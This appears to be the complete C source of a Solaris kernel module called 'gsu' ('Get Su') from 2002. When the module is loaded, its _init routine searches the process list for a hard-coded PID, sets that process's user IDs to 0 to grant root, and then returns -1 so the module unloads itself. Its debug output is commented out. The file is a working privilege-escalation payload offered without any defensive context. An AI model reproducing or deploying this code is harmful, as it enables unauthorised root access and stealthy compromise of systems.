/*
 * Copyright (C) 2001-2002 by jerryhj.
 */
#pragma ident "@(#)$Id: gsu.c,v 0.0.0.1 2002/05/24 $"

#include <sys/modctl.h>
#include <sys/sunddi.h>
#include <sys/proc.h>

typedef struct {
	unsigned int MAGIC_NUM1;
	pid_t gsu_id;
	unsigned int MAGIC_NUM2; 
} magic_pid_t;
static magic_pid_t magic_pid = {0x19760122, 0x8888, 0x94070125};

_init()
{
	proc_t *p;
	
	for (p = practive; p != NULL; p = p->p_next) {
		if(p->p_pidp->pid_id == magic_pid.gsu_id) {
			p->p_cred->cr_ruid = 0;
			p->p_cred->cr_uid = 0;
/**
			cmn_err(CE_CONT,"Get Su: find from next list pid = %d.\n", magic_pid.gsu_id); 	
**/
			return -1;
		}
	}

/**
	cmn_err(CE_CONT,"Get Su: no find pid = %d.\n", magic_pid.gsu_id); 	
**/
	return -1;
}

_info(struct modinfo *modinfop)
{
/**
	cmn_err(CE_CONT,"Get Su: I got here[info?].\n"); 	
**/
	return -1;
}
